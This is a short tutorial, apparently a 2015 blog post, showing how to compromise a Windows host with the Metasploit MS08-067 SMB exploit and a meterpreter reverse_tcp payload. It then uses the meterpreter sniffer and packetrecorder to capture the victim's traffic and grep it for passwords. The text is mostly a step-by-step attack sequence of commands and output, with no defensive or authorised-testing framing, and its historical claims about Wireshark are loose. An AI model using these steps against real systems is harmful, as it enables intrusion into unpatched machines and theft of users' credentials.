
Tutorial: Packet Sniffing


By: Multi Thinker

July 14, 2015

Packet sniffing was never easy before. In the late 90's, we used tunneling, Wireshark, MITM and SSL stripping. After a reverse_tcp payload in meterpreter, all we need is to use the sniffer extension.

I assume you have msfconsole opened and configured.

Let's begin...

Locating and using the Windows SMB exploit:

msf > use exploit/windows/smb/ms08_067_netapi

Setting the reverse_tcp payload:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

Setting the local host for ping backs:

msf exploit(ms08_067_netapi) > set LHOST x.x.x.x

Setting the target host:

msf exploit(ms08_067_netapi) > set RHOST x.x.x.x

And then fire:

msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (x.x.x.x:4444 -> x.x.x.x:1921)
Yes! We got our target under control. So now what? Just use the sniffer.

meterpreter > use sniffer
Loading extension sniffer...success.

We can even see the sniffer options by typing sniffer help. Let's start the sniffer:

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)

Here we go...

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 19 packets to PCAP file /tmp/all.cap
meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 92 packets to PCAP file /tmp/all.cap
Success! We can cat and open this .cap file with WinPcap, and there's one more method for sniffing, called packetrecorder, in meterpreter (same as the sniffer). Just type:

meterpreter > use packetrecorder

You can see the options in the help section. All you need is to give it a path for the records. Before starting to sniff, we need to choose which network interface it should use.

meterpreter > run packetrecorder -li

After that, you're ready to fire...!

meterpreter > run packetrecorder -i 2 -l /root/
[*] Starting Packet capture on interface 2
[+] Packet capture started
[*] Packets being saved in to /root/logs/packetrecorder/....
Again, we can use Wireshark or WinPcap to see our packets. Here, for Wireshark, just locate your file and type this command:

tshark -r recordfilename.cap | grep PASS
PASS : thisissecret
PASS : thisiscaptured
-- Multi Thinker